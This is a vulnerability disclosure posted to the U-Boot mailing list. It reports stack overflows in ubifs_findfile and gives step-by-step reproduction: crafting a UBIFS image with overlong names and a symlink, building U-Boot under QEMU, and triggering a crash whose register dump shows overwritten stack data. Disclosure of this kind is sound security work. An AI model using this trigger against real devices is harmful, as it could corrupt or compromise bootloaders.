Stack overflows in ubifs_findfile

Kostya Kortchinsky kostyak at google.com
Mon Oct 18 23:38:40 CEST 2021 

Greetings,

There appears to be a few stack overflows in ubifs_findfile as present in:
https://github.com/u-boot/u-boot/blob/d990f7d75d3dcf45a9220abc900495f00792f414/fs/ubifs/ubifs.c#L468

Namely:
- strcpy @
https://github.com/u-boot/u-boot/blob/d990f7d75d3dcf45a9220abc900495f00792f414/fs/ubifs/ubifs.c#L480
- memcpy @
https://github.com/u-boot/u-boot/blob/d990f7d75d3dcf45a9220abc900495f00792f414/fs/ubifs/ubifs.c#L522
- sprintf @
https://github.com/u-boot/u-boot/blob/d990f7d75d3dcf45a9220abc900495f00792f414/fs/ubifs/ubifs.c#L533

The code path can be hit via ubifs_load -> ubifs_read -> ubifs_findfile,
and demonstrated using the command line.

Here are some repro steps (they are bit old so hopefully this still works):

- Create an UBIFS image
On the host, build the directory structure you want in rootfs/
  mkdir `python -c "print('B'*255)"`
  cd BB...BB && touch `python -c "print('A'*255)"` && cd ..
  ln -s BB...BB/AA...AA CCCC
  mkfs.ubifs --min-io-size=8 --leb-size=262016 --max-leb-cnt=128 -r rootfs/
ubifs.img
  ubinize -o rootfs.ubi -p 262144 -m 128 -O 64 -s 128 -e 16 -v ubi.ini
ubi.ini contents:
  [ubifs]
  mode=ubi
  image=ubifs.img
  vol_id=0
  vol_type=dynamic
  vol_name=rootfs
  vol_flags=autoresize

  dd bs=1k count=64k if=/dev/zero of=nor1 && dd bs=1k conv=notrunc
if=rootfs.ubi of=nor1
This create a 64MB image containing our UBIFS image

- Create an U-Boot image
git clone git://www.denx.de/git/u-boot.git && cd u-boot
export ARCH=arm && export CROSS_COMPILE=arm-linux-gnueabihf-
Make sure you have the cross-compiler for arm, it required some tinkering
and doing some symbolic link on gLinux due to some binary ending in -gcc8
instead of -gcc, a symbolic link solves this
make qemu_arm_defconfig
make menuconfig
  The point here is to enable MTD, UBI, SPI. It’s pretty annoying as some
options mask some others, and there is no way I found to have a clear
picture of what to turn on or not. It was mostly trial and error until I
got something working.
make
dd bs=1k count=64k if=/dev/zero of=nor0 && dd bs=1k conv=notrunc
if=u-boot.bin of=nor0
  This creates a 64MB image containing our newly compiled U-Boot
qemu-system-arm -nographic -M virt -drive file=nor0,if=pflash,format=raw
  This should drop you to the u-boot command line
=> mtd list
  This should show 2 NOR flashes of 0x4000000 bytes

- Trigger
qemu-system-arm -nographic -M virt -drive file=nor0,if=pflash,format=raw
-drive file=nor1,if=pflash,format=raw
This drops you to the u-boot command line with the 2nd NOR containing the
UBIFS image
=> setenv mtdids nor1=ubi_flash
=> setenv mtdparts mtdparts=ubi_flash:-(rootfs)
=> mtdparts
This should show the following:
device nor1 <ubi_flash>, # parts = 1
 #: name                size            offset          mask_flags
 0: rootfs              0x04000000      0x00000000      0

active partition: nor1,0 - (rootfs) 0x04000000 @ 0x00000000

=> ubi part rootfs
=> ubifsmount ubi0:rootfs
=> ubifsls
This should show the following:
<LNK>         511  Fri Dec 13 20:11:34 2019  CCCC
<DIR>         472  Fri Dec 13 20:10:28 2019
 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

=> ubifsls CCCC
This should crash u-boot:
undefined instruction
pc : [<46e0f396>]          lr : [<47fd0e48>]
reloc pc : [<feebe396>]    lr : [<0007fe48>]
sp : 46e0fce8  ip : 47fd0e40     fp : 42424242
r10: 42424242  r9 : 46f10ed8     r8 : 42424242
r7 : 42424242  r6 : 42424242     r5 : 42424242  r4 : 42424242
r3 : 46f5e9c0  r2 : 00000001     r1 : 000008b8  r0 : 00000000
Flags: nZCv  IRQs off  FIQs off  Mode SVC_32
Code: 00000000 00000000 00000000 00000000 (00000000)
Resetting CPU ...

Thanks,

Kostya

More information about the U-Boot mailing list